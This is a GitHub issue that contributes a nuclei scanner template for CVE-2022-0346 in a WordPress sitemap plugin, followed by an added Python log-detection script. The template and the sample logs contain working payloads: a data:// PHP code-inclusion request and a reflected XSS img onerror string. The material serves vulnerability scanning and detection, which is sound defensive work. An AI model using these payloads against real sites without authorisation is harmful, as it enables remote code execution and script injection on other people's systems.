projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page: https://github.com/projectdiscovery/nuclei


CVE-2022-0346

akincibor opened this issue:

id: CVE-2022-0346

info:
  name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
  author: Akincibor
  severity: high
  description: The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
  reference:
    - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
  tags: xss,wp,wordpress,wp-plugin,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
      - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src onerror=alert(1)>"
          - "PHP Extension"
          - "PHP Version"
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻
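
An added detection example, not part of the original issue or the nuclei-templates project: it scans web access logs for requests whose `xsg-provider` parameter carries a URL scheme or angle brackets, the two value shapes the template above sends. The log lines, the benign value `posts`, and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2022:10:00:01 +0000] "GET /?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 5120 "-" "scanner"
203.0.113.5 - - [01/Mar/2022:10:00:02 +0000] "GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 812 "-" "scanner"
198.51.100.7 - - [01/Mar/2022:10:05:00 +0000] "GET /?p=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Mar/2022:10:06:00 +0000] "GET /?xsg-provider=posts&xsg-format=xml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client IP, request target and status code from a combined-format log line
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
# "scheme://" anywhere in the value (data://, php://, http://, ...)
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*://", re.I)
# angle brackets, which would be reflected as HTML in the error message
MARKUP_RE = re.compile(r"[<>]")


def suspicious_provider(value):
    """Return the reasons a decoded xsg-provider value looks hostile."""
    reasons = []
    if SCHEME_RE.search(value):
        reasons.append("url-scheme")
    if MARKUP_RE.search(value):
        reasons.append("markup")
    return reasons


def scan(log_text):
    """Return one finding per request with a suspicious xsg-provider value."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = target.partition("?")[2]
        # parse_qs percent-decodes values, so %3C is checked as "<"
        for value in parse_qs(query).get("xsg-provider", []):
            reasons = suspicious_provider(value)
            if reasons:
                findings.append({"client": client, "status": int(status),
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only shows the request was served; whether the value was reflected or included still has to be confirmed against the installed plugin version.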